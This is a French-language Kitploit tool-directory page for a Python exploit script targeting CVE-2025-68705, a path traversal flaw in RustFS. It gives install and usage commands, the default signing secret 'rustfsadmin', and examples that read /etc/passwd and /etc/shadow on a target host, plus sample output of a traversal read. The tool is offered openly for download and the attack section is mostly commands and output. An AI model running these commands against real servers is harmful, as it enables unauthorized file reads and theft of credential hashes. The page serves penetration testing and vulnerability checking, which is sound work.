Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-68705 — Script d'exploitation Python pour CVE-2025-68705, une vulnérabilité de traversée de chemin dans RustFS, permettant la lecture arbitraire de fichiers et la vérification de vulnérabilités sur les serveurs cibles. | Kitploit
Outils/GitHubGitHub/imjdl/cve-2025-68705
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubimjdl/cve-2025-68705

CVE-2025-68705

Script d'exploitation Python pour CVE-2025-68705, une vulnérabilité de traversée de chemin dans RustFS, permettant la lecture arbitraire de fichiers et la vérification de vulnérabilités sur les serveurs cibles.

Voir le dépôt
11il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-68705 - Exploitation de traversée de chemin RustFS

Description

Ce script exploite une vulnérabilité de traversée de chemin (CVE-2025-68705) dans RustFS qui permet de lire des fichiers arbitraires sur le serveur.

Prérequis

  • Python 3.6+
  • Voir requirements.txt pour les dépendances

Installation

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-68705.git
cd CVE-2025-68705
pip install -r requirements.txt

Utilisation

root@kitploit:~
python exp.py -H <host> -p <port> -f <file_path> [-s <secret>]

Arguments obligatoires

ArgumentDescription
-H, --hostAdresse IP ou nom d'hôte cible
-p, --portNuméro de port cible
-f, --fileChemin du fichier à lire (optionnel avec --check-only)

Arguments optionnels

ArgumentDescriptionPar défaut
-s, --secretClé secrète pour la signaturerustfsadmin
-o, --offsetDécalage de lecture du fichier0
-l, --lengthNombre d'octets à lire4096
--check-onlyVérifier uniquement si la cible est vulnérable-

Exemples

Lire le fichier /etc/passwd

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd

Lire /etc/shadow avec un décalage et une longueur personnalisés

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/shadow -o 0 -l 1024

Utiliser une clé secrète personnalisée

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/hosts -s customsecret

Vérifier uniquement si la cible est vulnérable

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 --check-only

Lire une plage spécifique du fichier

root@kitploit:~
python exp.py -H 192.168.1.128 -p 9000 -f /etc/passwd -o 100 -l 200

Exemple de sortie

root@kitploit:~
python ./exp.py -H 192.168.1.128 -p 19010 -f ../../../../etc/hosts -o 0 -l 100
[*] Target: 192.168.1.128:19010
[*] Secret: rustfsadmin
--------------------------------------------------
[*] Checking for CVE-2025-68705 vulnerability...
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../etc/passwd
[+] Target is VULNERABLE!
--------------------------------------------------
[*] Exploiting CVE-2025-68705 against 192.168.1.128:19010
[*] Reading file: ../../../../../../../../etc/hosts
[+] Successfully read file!

[+] File content (offset=0, length=100):
--------------------------------------------------
127.0.0.1       localhost
::1     localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastp

Licence

Ce projet est sous licence MIT - voir le fichier LICENSE pour plus de détails.

Références

  • Avis de sécurité RustFS
  • CVE-2025-68705
Télécharger l’outil